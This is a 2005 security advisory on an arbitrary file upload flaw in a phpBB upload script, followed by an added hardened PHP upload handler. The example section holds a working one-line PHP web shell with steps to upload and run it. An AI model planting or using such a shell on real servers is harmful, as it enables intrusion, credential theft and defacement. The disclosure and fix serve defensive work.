phpBB Upload Script "up.php" Arbitrary File Upload
#####################################################################
Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload"
$ Author: Status-x
$ Contact: phr4xz@xxxxxxxxx - status-x@xxxxxxxxxxxxxx
$ Date: 7 April 2005
$ Website: http://defacers.com.mx
$ Original Advisory: http://www.defacers.com.mx/advisories/2.txt
$ Risk: High
$ Vendor URL: http://phpbb.com
$ Affected Software: phpBB 2.0.x
Note: Sorry if it has been posted before
#####################################################################
-= Description =-
phpBB is a forum system written in PHP that supports images, polls,
private messages and more.
http://www.phpbb.com
---------------------------------------------------------------------------
-= Vulnerabilities =-
- | "Arbitrary File Upload" |
In phpBB forums there is a script (up.php) that allows remote and registered
users to upload files with arbitrary content and with any extension.
I didn't find any website where I could download the script, so I couldn't
check who made it.
- | Examples: |
We can create an example file to upload to the "test site":
<?
system($cmd);
?>
and save it as cmd.php. Then we go to:
--------------------------
http://target/phpbb/up.php
--------------------------
and upload our file. To view the file we just open:
-----------------------------------
http://target/phpbb/uploads/cmd.php
-----------------------------------
We can see that our file has been uploaded:
Warning: system(): Cannot execute a blank command in
/home/target/public_html/forum/uploads/tetx.php on line 2
Then we can execute *NIX commands to obtain highly sensitive information
that could end in the defacement of the affected site:
-----------------------------------------------------
Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP
Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux
/home/target/public_html/forum/uploads
uid=32029(target) gid=530(target) groups=530(target)
------------------------------------------------------
This is just an example of what a malicious attacker could do.
- | "Password Disclosure" |
A remote or local attacker can also read the config.php file, disclosing
the database credentials and possibly the FTP password.
------------------------------------------------------
Example
-= How to FIX =-
Filter the uploaded files against an allow-list of permitted extensions in
the up.php source.
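As an added illustration of that fix (this is not the original up.php, whose
source the author could not obtain, and not phpBB's own code), the following
PHP 7+ upload handler applies an extension allow-list, checks the real content
type of the file, discards the client-supplied name and stores the file outside
the web root so it can never be requested as a URL or run as PHP. The upload
directory path and the form field name "userfile" are assumptions; the
session check that restricts uploads to logged-in users is left to the forum.

```php
<?php
// Added example of a hardened upload handler; not the original up.php and
// not phpBB code. Requires PHP 7 or later (random_bytes, strict types).
declare(strict_types=1);

// Allow-list of extensions that are stored. None of these is executed by the
// web server, so even a disguised script is served (or not served) as data.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'txt', 'zip'];

// Expected content types per extension, checked against the file bytes
// rather than the client-supplied name or Content-Type header.
const ALLOWED_MIME = [
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'png'  => ['image/png'],
    'gif'  => ['image/gif'],
    'txt'  => ['text/plain'],
    'zip'  => ['application/zip'],
];

const MAX_UPLOAD_BYTES = 2 * 1024 * 1024;

// Assumed storage directory outside the document root: nothing stored here
// is reachable as http://target/phpbb/uploads/<name>.
const UPLOAD_DIR = '/home/target/uploads_private';

/**
 * Validate one $_FILES entry and store it under a random name.
 * Returns the stored file name; throws RuntimeException on any violation.
 */
function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or missing');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    if ($file['size'] > MAX_UPLOAD_BYTES) {
        throw new RuntimeException('File too large');
    }

    // Judge only the final extension, lower-cased, because that is what the
    // server would act on; "cmd.php" is rejected here.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        throw new RuntimeException('Extension not allowed');
    }

    // Sniff the actual bytes: a PHP script renamed to .jpg fails this check.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_MIME[$ext], true)) {
        throw new RuntimeException('Content does not match extension');
    }

    // Never reuse the client-supplied name; generate one server-side.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = UPLOAD_DIR . '/' . $stored;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640); // plain data, never executable
    return $stored;
}

// Entry point for the upload form (field name "userfile" is assumed).
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    try {
        $name = store_upload($_FILES['userfile'] ?? []);
        echo 'Stored as ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

The extension allow-list alone closes the hole the advisory describes; the
content-type check, the random name and the directory outside the web root are
defence in depth, so that a script slipped past the list still cannot be
reached as a URL or executed, which also removes the path to reading config.php.
If uploads must stay under the web root, additionally disable script execution
in that directory (for Apache with mod_php, "php_flag engine off" in an
.htaccess file there).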
-= Contact =-
Status-x
phr4xz@xxxxxxxxx
http://www.defacers.com.mx